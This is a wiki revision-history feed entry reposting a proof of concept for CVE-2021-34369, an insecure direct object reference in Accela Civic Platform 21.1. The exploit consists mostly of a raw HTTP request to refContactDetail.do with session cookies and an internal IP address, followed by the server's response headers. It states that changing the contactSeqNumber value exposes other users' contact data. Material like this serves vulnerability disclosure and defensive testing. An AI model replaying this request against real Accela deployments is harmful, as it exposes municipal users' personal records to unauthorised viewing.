https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-34369_Accela_Civic_Platform_21.1_%E4%B8%8D%E5%AE%89%E5%85%A8%E7%9A%84%E7%9B%B4%E6%8E%A5%E5%B0%8D%E8%B1%A1%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E 2026-04-15T04:55:38Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2021-34369_Accela_Civic_Platform_21.1_%E4%B8%8D%E5%AE%89%E5%85%A8%E7%9A%84%E7%9B%B4%E6%8E%A5%E5%B0%8D%E8%B1%A1%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E&diff=5044&oldid=prev 2021-06-15T01:17:52Z

<p>Created page with &quot;&lt;pre&gt; # Exploit Title: Accela Civic Platform 21.1 - &#039;contactSeqNumber&#039; Insecure Direct Object References (IDOR) # Software Link: https://www.accela.com/civic-platform/ # Versi...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> # Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)<br /> # Software Link: https://www.accela.com/civic-platform/<br /> # Version: &lt;= 21.1<br /> # Author: Abdulazeez Alaseeri<br /> # Tested on: JBoss server/windows<br /> # Type: Web App<br /> # Date: 07/06/2021<br /> # CVE: CVE-2021-34369<br /> <br /> <br /> ================================================================<br /> Accela Civic Platform Insecure Direct Object References &lt;= 21.1<br /> ================================================================<br /> <br /> This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber<br /> ================================================================<br /> Request Heeaders start<br /> ================================================================<br /> <br /> GET /portlets/contact/ref/refContactDetail.do?mode=view&amp;lookup=false&amp;contactSeqNumber=848693&amp;module=Licenses HTTP/1.1<br /> <br /> Host: Hidden<br /> <br /> Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff=&quot;Hidden&quot;; ACSwitchAgency=&quot;Hidden&quot;; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802<br /> <br /> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br /> <br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> <br /> Accept-Language: en-US,en;q=0.5<br /> <br /> Accept-Encoding: gzip, deflate<br /> <br /> Upgrade-Insecure-Requests: 1<br /> <br /> Te: trailers<br /> <br /> Connection: close<br /> <br /> ================================================================<br /> Request Heeaders end<br /> ================================================================<br /> <br /> <br /> <br /> ================================================================<br /> Response Heeaders start<br /> ================================================================<br /> HTTP/1.1 200 OK<br /> <br /> Expires: Thu, 01 Jan 1970 00:00:01 GMT<br /> <br /> Cache-Control: no-cache<br /> <br /> X-Powered-By: JSP/2.3<br /> <br /> Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure<br /> <br /> Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure<br /> <br /> Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure<br /> <br /> Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure<br /> <br /> X-XSS-Protection: 0<br /> <br /> Pragma: No-cache<br /> <br /> X-UA-Compatible: IE=EDGE<br /> <br /> Date: Wed, 09 Jun 2021 04:09:40 GMT<br /> <br /> Connection: close<br /> <br /> Content-Type: text/html;charset=UTF-8<br /> <br /> Content-Length: 98126<br /> ================================================================<br /> Response Heeaders end<br /> ================================================================<br /> <br /> contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR<br /> &lt;/pre&gt;</div>

Pwnwiki